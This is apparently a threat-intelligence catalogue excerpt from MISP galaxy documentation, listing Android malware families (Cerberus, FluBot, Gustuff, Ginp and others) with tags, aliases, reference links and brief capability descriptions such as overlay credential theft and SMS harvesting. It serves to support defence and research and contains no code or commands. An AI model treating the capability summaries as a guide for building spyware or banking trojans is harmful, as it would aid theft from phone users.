<td><a href="https://twitter.com/node5">https://twitter.com/node5</a></td>
</tr>
<tr>
<td><a href="https://twitter.com/kahusecurity">https://twitter.com/kahusecurity</a></td>
</tr>
</tbody>
</table>

SpelevoEK

The Spelevo exploit kit seems to have similarities to SPL EK, which is a different exploit kit.

The tag is: `misp-galaxy:exploit-kit="SpelevoEK"`

Table 792. Table References

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</table>
Malpedia

Malware galaxy cluster based on Malpedia.

Malpedia is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.

authors

Davide Arcuri - Alexandre Dulaunoy - Steffen Enders - Andrea Garavaglia - Andras Iklody - Daniel Plohmann - Christophe Vandeplas

FastCash

The tag is: misp-galaxy:malpedia="FastCash"

FastCash is also known as:

Table 793. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/aix.fastcash">https://malpedia.caad.fkie.fraunhofer.de/details/aix.fastcash</a></td>
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<tr>
<td><a href="https://threatrecon.nshc.net/2019/01/23/sectora01-custom-proxy-utility-tool-analysis/">https://threatrecon.nshc.net/2019/01/23/sectora01-custom-proxy-utility-tool-analysis/</a></td>
</tr>
<tr>
<td><a href="https://github.com/fboldewin/FastCashMalwareDissected/">https://github.com/fboldewin/FastCashMalwareDissected/</a></td>
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<td><a href="https://www.us-cert.gov/ncas/alerts/TA18-275A">https://www.us-cert.gov/ncas/alerts/TA18-275A</a></td>
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<tr>
<td><a href="https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html">https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html</a></td>
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<td><a href="https://www.youtube.com/watch?v=LUXOcpIRxmg">https://www.youtube.com/watch?v=LUXOcpIRxmg</a></td>
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<td><a href="https://www.youtube.com/watch?v=zGvQPtejX9w">https://www.youtube.com/watch?v=zGvQPtejX9w</a></td>
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ActionSpy

The tag is: misp-galaxy:malpedia="ActionSpy"
ActionSpy is also known as:

- AxeSpy

Table 794. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.actionspy">https://malpedia.caad.fkie.fraunhofer.de/details/apk.actionspy</a></td>
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**AdoBot**

The tag is: `misp-galaxy:malpedia="AdoBot"`

AdoBot is also known as:

Table 795. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.adobot">https://malpedia.caad.fkie.fraunhofer.de/details/apk.adobot</a></td>
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<td><a href="https://twitter.com/LukasStefanko/status/1243198756981559296">https://twitter.com/LukasStefanko/status/1243198756981559296</a></td>
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**AdultSwine**

The tag is: `misp-galaxy:malpedia="AdultSwine"`

AdultSwine is also known as:

Table 796. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.adultswine">https://malpedia.caad.fkie.fraunhofer.de/details/apk.adultswine</a></td>
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<td><a href="https://research.checkpoint.com/malware-displaying-porn-ads-discovered-in-game-apps-on-google-play/">https://research.checkpoint.com/malware-displaying-porn-ads-discovered-in-game-apps-on-google-play/</a></td>
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**AhMyth**

The tag is: `misp-galaxy:malpedia="AhMyth"`

AhMyth is also known as:

Table 797. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.ahmyth">https://malpedia.caad.fkie.fraunhofer.de/details/apk.ahmyth</a></td>
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<td><a href="https://www.welivesecurity.com/2019/08/22/first-spyware-android-ahmyth-google-play/">https://www.welivesecurity.com/2019/08/22/first-spyware-android-ahmyth-google-play/</a></td>
</tr>
</tbody>
</table>
Alien

According to ThreatFabric, this is a fork of Cerberus v1 (active January 2020+). Alien is a rented banking trojan that can remotely control a phone and achieves RAT functionality by abusing TeamViewer.

The tag is: `misp-galaxy:malpedia=“Alien”`

Alien is also known as:

Table 798. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.alien">https://malpedia.caad.fkie.fraunhofer.de/details/apk.alien</a></td>
</tr>
<tr>
<td><a href="https://research.checkpoint.com/2021/clast82-a-new-dropper-on-google-play-dropping-the-alienbot-banker-and-mrat/">https://research.checkpoint.com/2021/clast82-a-new-dropper-on-google-play-dropping-the-alienbot-banker-and-mrat/</a></td>
</tr>
</tbody>
</table>

AndroRAT

Androrat is a remote administration tool developed in Java Android for the client side and in Java/Swing for the Server. The name Androrat is a mix of Android and RAT (Remote Access Tool). It has been developed in a team of 4 for a university project. The goal of the application is to give the control of the android system remotely and retrieve informations from it.

The tag is: `misp-galaxy:malpedia=“AndroRAT”`

AndroRAT is also known as:

Table 799. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.androrat">https://malpedia.caad.fkie.fraunhofer.de/details/apk.androrat</a></td>
</tr>
<tr>
<td><a href="https://www.stratosphereips.org/blog/2020/11/10/android-mischief-rats-dataset">https://www.stratosphereips.org/blog/2020/11/10/android-mischief-rats-dataset</a></td>
</tr>
<tr>
<td><a href="https://github.com/DesignativeDave/androrat">https://github.com/DesignativeDave/androrat</a></td>
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</table>
Anubis (Android)

The tag is: misp-galaxy:malpedia="Anubis (Android)"

Anubis (Android) is also known as:

- BankBot
- android.bankbot
- android.bankspy

Table 800. Table References

Links

- https://malpedia.caad.fkie.fraunhofer.de/details/apk.anubis
- http://b0n1.blogspot.de/2017/05/tracking-android-bankbot.html
- https://www.youtube.com/watch?v=U0UsfO-0uJM
- http://blog.koodous.com/2017/05/bankbot-on-google-play.html
- https://www.fortinet.com/blog/threat-research/bankbot-the-prequel.html
- https://community.riskiq.com/article/85b3db8c
- https://n1ght-w0lf.github.io/malware%20analysis/anubis-banking-malware/
AnubisSpy

The tag is: misp-galaxy:malpedia="AnubisSpy"

AnubisSpy is also known as:

Table 801. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.anubisspy">https://malpedia.caad.fkie.fraunhofer.de/details/apk.anubisspy</a></td>
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Asacub

The tag is: misp-galaxy:malpedia="Asacub"

Asacub is also known as:

Table 802. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.asacub">https://malpedia.caad.fkie.fraunhofer.de/details/apk.asacub</a></td>
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Ashas

The tag is: misp-galaxy:malpedia="Ashas"

Ashas is also known as:

Table 803. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.ashas">https://malpedia.caad.fkie.fraunhofer.de/details/apk.ashas</a></td>
</tr>
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</table>
ATANK

According to Lukas Stefanko, this is an open-source crypto-ransomware found on Github in 2018. It can en/decrypt files (AES, key: 32 random chars, sent to C&C), uses email as contact point but will remove all files after 24 hours or after a reboot.

The tag is: `misp-galaxy:malpedia="ATANK"`

ATANK is also known as:

Table 804. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.atank">https://malpedia.caad.fkie.fraunhofer.de/details/apk.atank</a></td>
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<td><a href="https://twitter.com/LukasStefanko/status/1268070798293708800">https://twitter.com/LukasStefanko/status/1268070798293708800</a></td>
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BADCALL (Android)

The tag is: `misp-galaxy:malpedia="BADCALL (Android)"`

BADCALL (Android) is also known as:

Table 805. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.badcall">https://malpedia.caad.fkie.fraunhofer.de/details/apk.badcall</a></td>
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<tr>
<td><a href="https://www.us-cert.gov/ncas/analysis-reports/ar19-252a">https://www.us-cert.gov/ncas/analysis-reports/ar19-252a</a></td>
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BadPatch

The tag is: `misp-galaxy:malpedia="BadPatch"`

BadPatch is also known as:

- WelcomeChat

Table 806. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.badpatch">https://malpedia.caad.fkie.fraunhofer.de/details/apk.badpatch</a></td>
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<tr>
<td><a href="https://www.welivesecurity.com/2020/07/14/welcome-chat-secure-messaging-app-nothing-further-truth/">https://www.welivesecurity.com/2020/07/14/welcome-chat-secure-messaging-app-nothing-further-truth/</a></td>
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Bahamut (Android)

The tag is: `misp-galaxy:malpedia="Bahamut (Android)"`

Bahamut (Android) is also known as:
Table 807. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.bahamut">https://malpedia.caad.fkie.fraunhofer.de/details/apk.bahamut</a></td>
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Basbanke

The tag is: misp-galaxy:malpedia="Basbanke"

Basbanke is also known as:

Table 808. Table References

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<td><a href="https://twitter.com/LukasStefanko/status/1280243673100402690">https://twitter.com/LukasStefanko/status/1280243673100402690</a></td>
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BianLian

The tag is: misp-galaxy:malpedia="BianLian"

BianLian is also known as:

Table 809. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.bianlian">https://malpedia.caad.fkie.fraunhofer.de/details/apk.bianlian</a></td>
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<tr>
<td><a href="https://www.fortinet.com/blog/threat-research/new-wave-bianlian-malware.html">https://www.fortinet.com/blog/threat-research/new-wave-bianlian-malware.html</a></td>
</tr>
<tr>
<td><a href="https://www.threatfabric.com/blogs/bianlian_from_rags_to_riches_the_malware_dropper_that_had_a_dream.html">https://www.threatfabric.com/blogs/bianlian_from_rags_to_riches_the_malware_dropper_that_had_a_dream.html</a></td>
</tr>
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BlackRock

The tag is: misp-galaxy:malpedia="BlackRock"

BlackRock is also known as:

Table 810. Table References
Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.blackrock
https://www.threatfabric.com/blogs/blackrock_the_trojan_that_wanted_to_get_them_all.html

BRATA

The tag is: misp-galaxy:malpedia="BRATA"

BRATA is also known as:

Table 811. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.brata">https://malpedia.caad.fkie.fraunhofer.de/details/apk.brata</a></td>
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BusyGasper

The tag is: misp-galaxy:malpedia="BusyGasper"

BusyGasper is also known as:

Table 812. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.busygasper">https://malpedia.caad.fkie.fraunhofer.de/details/apk.busygasper</a></td>
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<td><a href="https://securelist.com/busygasper-the-unfriendly-spy/87627/">https://securelist.com/busygasper-the-unfriendly-spy/87627/</a></td>
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CarbonSteal

The tag is: misp-galaxy:malpedia="CarbonSteal"

CarbonSteal is also known as:

Table 813. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.carbonsteal">https://malpedia.caad.fkie.fraunhofer.de/details/apk.carbonsteal</a></td>
</tr>
</tbody>
</table>

Catelites

Catelites Bot (identified by Avast and SfyLabs in December 2017) is an Android trojan, with ties to CronBot. Once the malicious app is installed, attackers use social engineering tricks and window
overlays to get credit card details from the victim. The distribution vector seems to be fake apps from third-party app stores (not Google Play) or via malvertisement. After installation and activation, the app creates fake Gmail, Google Play and Chrome icons. Furthermore, the malware sends a fake system notification, telling the victim that they need to re-authenticate with Google Services and ask for their credit card details to be entered. Currently the malware has overlays for over 2,200 apps of banks and financial institutions.

The tag is: misp-galaxy:malpedia="Catelites"

Catelites is also known as:

Table 814. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.catelites">https://malpedia.caad.fkie.fraunhofer.de/details/apk.catelites</a></td>
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<td><a href="https://www.youtube.com/watch?v=1LOy0ZyjEOk">https://www.youtube.com/watch?v=1LOy0ZyjEOk</a></td>
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Cerberus

The tag is: misp-galaxy:malpedia="Cerberus"

Cerberus is also known as:

Table 815. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.cerberus">https://malpedia.caad.fkie.fraunhofer.de/details/apk.cerberus</a></td>
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<td><a href="https://community.riskiq.com/article/85b3db8c">https://community.riskiq.com/article/85b3db8c</a></td>
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<td><a href="https://blog.cyberint.com/cerberus-is-dead-long-live-cerberus">https://blog.cyberint.com/cerberus-is-dead-long-live-cerberus</a></td>
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<td><a href="https://github.com/ics-iot-bootcamp/cerberus_research">https://github.com/ics-iot-bootcamp/cerberus_research</a></td>
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Chamois

The tag is: misp-galaxy:malpedia="Chamois"

Chamois is also known as:

Table 816. Table References

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Charger

The tag is: misp-galaxy:malpedia="Charger"

Charger is also known as:

Table 817. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.charger">https://malpedia.caad.fkie.fraunhofer.de/details/apk.charger</a></td>
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<td><a href="http://blog.checkpoint.com/2017/01/24/charger-malware/">http://blog.checkpoint.com/2017/01/24/charger-malware/</a></td>
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<td><a href="http://blog.joesecurity.org/2017/01/deep-analysis-of-android-ransom-charger.html">http://blog.joesecurity.org/2017/01/deep-analysis-of-android-ransom-charger.html</a></td>
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</table>

Chrysaor

The tag is: misp-galaxy:malpedia="Chrysaor"

Chrysaor is also known as:

- JigglyPuff
- Pegasus

Table 818. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.chrysaor">https://malpedia.caad.fkie.fraunhofer.de/details/apk.chrysaor</a></td>
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**Clientor**

The tag is: `misp-galaxy:malpedia="Clientor"`

Clientor is also known as:

Table 819. Table References

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**Clipper**

The tag is: `misp-galaxy:malpedia="Clipper"`

Clipper is also known as:

Table 820. Table References

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<td><a href="https://lukasstefanko.com/2019/02/android-clipper-found-on-google-play.html">https://lukasstefanko.com/2019/02/android-clipper-found-on-google-play.html</a></td>
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<td><a href="https://www.welivesecurity.com/2019/02/08/first-clipper-malware-google-play/">https://www.welivesecurity.com/2019/02/08/first-clipper-malware-google-play/</a></td>
</tr>
<tr>
<td><a href="https://news.drweb.com/show?lng=en&amp;i=12739">https://news.drweb.com/show?lng=en&amp;i=12739</a></td>
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**CloudAtlas**

The tag is: `misp-galaxy:malpedia="CloudAtlas"`

CloudAtlas is also known as:

Table 821. Table References
**CometBot**

The tag is: `misp-galaxy:malpedia="CometBot"`

CometBot is also known as:

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**Connic**

The tag is: `misp-galaxy:malpedia="Connic"`

Connic is also known as:

- SpyBanker

---

**Coronavirus Android Worm**

Poses as an app that can offer a "corona safety mask" but phone's address book and sends sms to contacts, spreading its own download link.

The tag is: `misp-galaxy:malpedia="Coronavirus Android Worm"`

Coronavirus Android Worm is also known as:

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**Table 822. Table References**

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**Table 823. Table References**

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.comet_bot">https://malpedia.caad.fkie.fraunhofer.de/details/apk.comet_bot</a></td>
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<tr>
<td><a href="https://twitter.com/LukasStefanko/status/1102937833071935491">https://twitter.com/LukasStefanko/status/1102937833071935491</a></td>
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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.comet_bot">https://malpedia.caad.fkie.fraunhofer.de/details/apk.comet_bot</a></td>
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Cpuminer (Android)

The tag is: *misp-galaxy:malpedia="Cpuminer (Android)"

Cpuminer (Android) is also known as:

**Table 825. Table References**

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<td><a href="https://blog.trendmicro.com/trendlabs-security-intelligence/coin-miner-mobile-malware-returns-hits-google-play/">https://blog.trendmicro.com/trendlabs-security-intelligence/coin-miner-mobile-malware-returns-hits-google-play/</a></td>
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CryCryptor

The tag is: *misp-galaxy:malpedia="CryCryptor"

CryCryptor is also known as:

- CryCrypter
- CryDroid

**Table 826. Table References**

<table>
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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.crycryptor">https://malpedia.caad.fkie.fraunhofer.de/details/apk.crycryptor</a></td>
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Dark Shades

The tag is: *misp-galaxy:malpedia="Dark Shades"

Dark Shades is also known as:

- Rogue

**Table 827. Table References**

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.darkshades">https://malpedia.caad.fkie.fraunhofer.de/details/apk.darkshades</a></td>
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</table>
**DEFENSOR ID**

The tag is: *misp-galaxy:malpedia=* "DEFENSOR ID"

DEFENSOR ID is also known as:

- Defensor Digital

*Table 828. Table References*

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.defensor_id">https://malpedia.caad.fkie.fraunhofer.de/details/apk.defensor_id</a></td>
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<tr>
<td><a href="https://www.welivesecurity.com/2020/05/22/insidious-android-malware-gives-up-all-malicious-features-but-one-gain-stealth/">https://www.welivesecurity.com/2020/05/22/insidious-android-malware-gives-up-all-malicious-features-but-one-gain-stealth/</a></td>
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**Dendroid**

The tag is: *misp-galaxy:malpedia=* "Dendroid"

Dendroid is also known as:

*Table 829. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.dendroid">https://malpedia.caad.fkie.fraunhofer.de/details/apk.dendroid</a></td>
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<td><a href="https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=a29d7d7a-f150-46cf-9bb9-a1f9f4d32a80&amp;CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&amp;tab=librarydocuments">https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=a29d7d7a-f150-46cf-9bb9-a1f9f4d32a80&amp;CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&amp;tab=librarydocuments</a></td>
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**dmsSpy**

The tag is: *misp-galaxy:malpedia=* "dmsSpy"

dmsSpy is also known as:

*Table 830. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.dmsspy">https://malpedia.caad.fkie.fraunhofer.de/details/apk.dmsspy</a></td>
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DoubleAgent

The tag is: misp-galaxy:malpedia="DoubleAgent"

DoubleAgent is also known as:

Table 831. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.doubleagent">https://malpedia.caad.fkie.fraunhofer.de/details/apk.doubleagent</a></td>
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DoubleLocker

The tag is: misp-galaxy:malpedia="DoubleLocker"

DoubleLocker is also known as:

Table 832. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.doublelocker">https://malpedia.caad.fkie.fraunhofer.de/details/apk.doublelocker</a></td>
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DroidJack

The tag is: misp-galaxy:malpedia="DroidJack"

DroidJack is also known as:

Table 833. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.droidjack">https://malpedia.caad.fkie.fraunhofer.de/details/apk.droidjack</a></td>
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<td><a href="https://www.stratosphereips.org/blog/2021/1/22/analysis-of-droidjack-v44-rat-network-traffic">https://www.stratosphereips.org/blog/2021/1/22/analysis-of-droidjack-v44-rat-network-traffic</a></td>
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DualToy (Android)

The tag is: misp-galaxy:malpedia="DualToy (Android)"

DualToy (Android) is also known as:

Table 834. Table References
Dvmap

The tag is: `misp-galaxy:malpedia="Dvmap"`

Dvmap is also known as:

Table 835. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.dvmap">https://malpedia.caad.fkie.fraunhofer.de/details/apk.dvmap</a></td>
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</table>

Eventbot

According to ThreatFabric, the app overlays 15 financial targets from UK, Italy, and Spain, sniffs 234 apps from banks located in Europe as well as crypto wallets.

The tag is: `misp-galaxy:malpedia="Eventbot"`

Eventbot is also known as:

Table 836. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.eventbot">https://malpedia.caad.fkie.fraunhofer.de/details/apk.eventbot</a></td>
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<td><a href="https://twitter.com/ThreatFabric/status/1240664876558823424">https://twitter.com/ThreatFabric/status/1240664876558823424</a></td>
</tr>
<tr>
<td><a href="https://www.cybereason.com/blog/eventbot-a-new-mobile-banking-trojan-is-born">https://www.cybereason.com/blog/eventbot-a-new-mobile-banking-trojan-is-born</a></td>
</tr>
<tr>
<td><a href="https://www.youtube.com/watch?v=qqwOrLR2rgU">https://www.youtube.com/watch?v=qqwOrLR2rgU</a></td>
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ExoBot

The tag is: `misp-galaxy:malpedia="ExoBot"`

ExoBot is also known as:

Table 837. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.exobot">https://malpedia.caad.fkie.fraunhofer.de/details/apk.exobot</a></td>
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Exodus

The tag is: misp-galaxy:malpedia="Exodus"

Exodus is also known as:

Table 838. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.exodus">https://malpedia.caad.fkie.fraunhofer.de/details/apk.exodus</a></td>
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<tr>
<td><a href="https://securitywithoutborders.org/blog/2019/03/29/exodus.html">https://securitywithoutborders.org/blog/2019/03/29/exodus.html</a></td>
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FakeSpy

The tag is: misp-galaxy:malpedia="FakeSpy"

FakeSpy is also known as:

Table 839. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.fakespy">https://malpedia.caad.fkie.fraunhofer.de/details/apk.fakespy</a></td>
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FakeGram

The tag is: misp-galaxy:malpedia="FakeGram"

FakeGram is also known as:

- FakeTgram

Table 840. Table References
FileCoder

The tag is: `misp-galaxy:malpedia=“FileCoder”`

FileCoder is also known as:

Table 841. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.faketgram">https://malpedia.caad.fkie.fraunhofer.de/details/apk.faketgram</a></td>
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FinFisher (Android)

The tag is: `misp-galaxy:malpedia=“FinFisher (Android)”`

FinFisher (Android) is also known as:

Table 842. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.filecoder">https://malpedia.caad.fkie.fraunhofer.de/details/apk.filecoder</a></td>
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<tr>
<td><a href="https://github.com/linuzifer/FinSpy-Dokumentation">https://github.com/linuzifer/FinSpy-Dokumentation</a></td>
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FlexiSpy (Android)

The tag is: `misp-galaxy:malpedia=“FlexiSpy (Android)”`

FlexiSpy (Android) is also known as:

Table 843. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.flexispy">https://malpedia.caad.fkie.fraunhofer.de/details/apk.flexispy</a></td>
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FlexNet

The tag is: `misp-galaxy:malpedia="FlexNet"`

FlexNet is also known as:

- gugi

Table 844. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.flexnet">https://malpedia.caad.fkie.fraunhofer.de/details/apk.flexnet</a></td>
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<tr>
<td><a href="https://twitter.com/LukasStefanko/status/886849558143279104">https://twitter.com/LukasStefanko/status/886849558143279104</a></td>
</tr>
</tbody>
</table>

FluBot

PRODAFT describes FluBot as a banking malware, targeting Spain and potentially German-, Polish-, and English-speaking users. It uses a DGA for its C&C.

The tag is: `misp-galaxy:malpedia="FluBot"`

FluBot is also known as:

Table 845. Table References

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<tr>
<th>Links</th>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.flubot">https://malpedia.caad.fkie.fraunhofer.de/details/apk.flubot</a></td>
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FunkyBot

The tag is: `misp-galaxy:malpedia="FunkyBot"`

FunkyBot is also known as:

Table 846. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.funkybot">https://malpedia.caad.fkie.fraunhofer.de/details/apk.funkybot</a></td>
</tr>
<tr>
<td><a href="https://www.fortinet.com/blog/threat-research/funkybot-malware-targets-japan.html">https://www.fortinet.com/blog/threat-research/funkybot-malware-targets-japan.html</a></td>
</tr>
<tr>
<td><a href="https://securelist.com/roaming-mantis-part-v/96250/">https://securelist.com/roaming-mantis-part-v/96250/</a></td>
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</tbody>
</table>
FurBall

According to Check Point, they uncovered an operation dubbed "Domestic Kitten", which uses malicious Android applications to steal sensitive personal information from its victims: screenshots, messages, call logs, surrounding voice recordings, and more. This operation managed to remain under the radar for a long time, as the associated files were not attributed to a known malware family and were only detected by a handful of security vendors.

The tag is: misp-galaxy:malpedia="FurBall"

FurBall is also known as:

Table 847. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.furball">https://malpedia.caad.fkie.fraunhofer.de/details/apk.furball</a></td>
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<td><a href="https://ti.qianxin.com/blog/articles/surprised-by-cyrus-the-great-disclosure-against-Iran-cyrus-attack/">https://ti.qianxin.com/blog/articles/surprised-by-cyrus-the-great-disclosure-against-Iran-cyrus-attack/</a></td>
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Geost

The tag is: misp-galaxy:malpedia="Geost"

Geost is also known as:

Table 848. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.geost">https://malpedia.caad.fkie.fraunhofer.de/details/apk.geost</a></td>
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<td><a href="https://www.gosecure.net/blog/2020/12/02/deep-dive-into-an-obfuscation-as-a-service-for-android-malware/">https://www.gosecure.net/blog/2020/12/02/deep-dive-into-an-obfuscation-as-a-service-for-android-malware/</a></td>
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Ghimob

The tag is: *misp-galaxy:malpedia*="Ghimob"

Ghimob is also known as:

*Table 849. Table References*

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.ghimob">https://malpedia.caad.fkie.fraunhofer.de/details/apk.ghimob</a></td>
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GhostCtrl

The tag is: *misp-galaxy:malpedia*="GhostCtrl"

GhostCtrl is also known as:

*Table 850. Table References*

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.ghostctrl">https://malpedia.caad.fkie.fraunhofer.de/details/apk.ghostctrl</a></td>
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</tbody>
</table>

Ginp

Ginp is a mobile banking software targeting Android devices that was discovered by Kaspersky. The malware is able to steal both user credentials and credit cards numbers by implementing overlay attacks. For this, overlay targets are for example the default SMS application. What makes Ginp a remarkable family is how its operators managed to have it remain undetected over time even and it receiving version upgrades over many years. According to ThreatFabric, Ginp has the following features:

- Overlaying: Dynamic (local overlays obtained from the C2)
- SMS harvesting: SMS listing SMS harvestig: SMS forwarding
- Contact list collection Application listing
- Overlaying: Targets list update
- SMS: Sending Calls: Call forwarding
- C2 Resilience: Auxiliary C2 list
- Self-protection: Preventing removal
- Self-protection: Emulation-detection.

The tag is: *misp-galaxy:malpedia*="Ginp"

Ginp is also known as:

*Table 851. Table References*
GlanceLove

The tag is: `misp-galaxy:malpedia="GlanceLove"`

GlanceLove is also known as:

*Table 852. Table References*

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.glancelove">https://malpedia.caad.fkie.fraunhofer.de/details/apk.glancelove</a></td>
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<td><a href="https://www.clearskysec.com/glancelove/">https://www.clearskysec.com/glancelove/</a></td>
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GoldenEagle

The tag is: `misp-galaxy:malpedia="GoldenEagle"`

GoldenEagle is also known as:

*Table 853. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.goldeneagle">https://malpedia.caad.fkie.fraunhofer.de/details/apk.goldeneagle</a></td>
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GoldenRAT

The tag is: `misp-galaxy:malpedia="GoldenRAT"`

GoldenRAT is also known as:
GPlayed

Cisco Talos identifies GPlayed as a malware written in .NET using the Xamarin environment for mobile applications. It is considered powerful because of its capability to adapt after its deployment. In order to achieve this adaptability, the operator has the capability to remotely load plugins, inject scripts and even compile new .NET code that can be executed.

The tag is: `misp-galaxy:malpedia="GPlayed"`

GPlayed is also known as:

Table 855. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.gplayed">https://malpedia.caad.fkie.fraunhofer.de/details/apk.gplayed</a></td>
</tr>
<tr>
<td><a href="https://blog.talosintelligence.com/2018/10/gplayedtrojan.html">https://blog.talosintelligence.com/2018/10/gplayedtrojan.html</a></td>
</tr>
</tbody>
</table>

Gustuff

Group-IB describes Gustuff as a mobile Android Trojan, which includes potential targets of customers in leading international banks, users of cryptocurrency services, popular ecommerce websites and marketplaces. Gustuff has previously never been reported. Gustuff is a new generation of malware complete with fully automated features designed to steal both fiat and crypto currency from user accounts en masse. The Trojan uses the Accessibility Service, intended to assist people with disabilities. The analysis of Gustuff sample revealed that the Trojan is equipped with web fakes designed to potentially target users of Android apps of top international banks including Bank of America, Bank of Scotland, J.P.Morgan, Wells Fargo, Capital One, TD Bank, PNC Bank, and crypto services such as Bitcoin Wallet, BitPay, Cryptopay, Coinbase etc. Group-IB specialists discovered that Gustuff could potentially target users of more than 100 banking apps, including 27 in the US, 16 in Poland, 10 in Australia, 9 in Germany, and 8 in India and users of 32 cryptocurrency apps.

The tag is: `misp-galaxy:malpedia="Gustuff"`

Gustuff is also known as:

Table 856. Table References

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**HARDRAIN (Android)**

The tag is: `misp-galaxy:malpedia="HARDRAIN (Android)"

HARDRAIN (Android) is also known as:

*Table 857. Table References*

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.hardrain">https://malpedia.caad.fkie.fraunhofer.de/details/apk.hardrain</a></td>
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<td><a href="https://securingtomorrow.mcafee.com/mcafee-labs/android-malware-appears-linked-to-lazarus-cybercrime-group/#sf174581990">https://securingtomorrow.mcafee.com/mcafee-labs/android-malware-appears-linked-to-lazarus-cybercrime-group/#sf174581990</a></td>
</tr>
<tr>
<td><a href="https://unit42.paloaltonetworks.com/unit42-operation-blockbuster-goes-mobile/">https://unit42.paloaltonetworks.com/unit42-operation-blockbuster-goes-mobile/</a></td>
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**HawkShaw**

The tag is: `misp-galaxy:malpedia="HawkShaw"

HawkShaw is also known as:

*Table 858. Table References*

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.hawkshaw">https://malpedia.caad.fkie.fraunhofer.de/details/apk.hawkshaw</a></td>
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**HenBox**

The tag is: `misp-galaxy:malpedia="HenBox"

HenBox is also known as:

*Table 859. Table References*

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HeroRAT

The tag is: misp-galaxy:malpedia="HeroRAT"

HeroRAT is also known as:

Table 860. Table References

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HiddenAd

The tag is: misp-galaxy:malpedia="HiddenAd"

HiddenAd is also known as:

Table 861. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.hiddenad">https://malpedia.caad.fkie.fraunhofer.de/details/apk.hiddenad</a></td>
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<tr>
<td><a href="https://labs.bitdefender.com/2020/03/infected-zoom-apps-for-android-target-work-from-home-users">https://labs.bitdefender.com/2020/03/infected-zoom-apps-for-android-target-work-from-home-users</a></td>
</tr>
<tr>
<td><a href="https://twitter.com/LukasStefanko/status/1136568939239137280">https://twitter.com/LukasStefanko/status/1136568939239137280</a></td>
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Hydra

The tag is: misp-galaxy:malpedia="Hydra"

Hydra is also known as:

Table 862. Table References

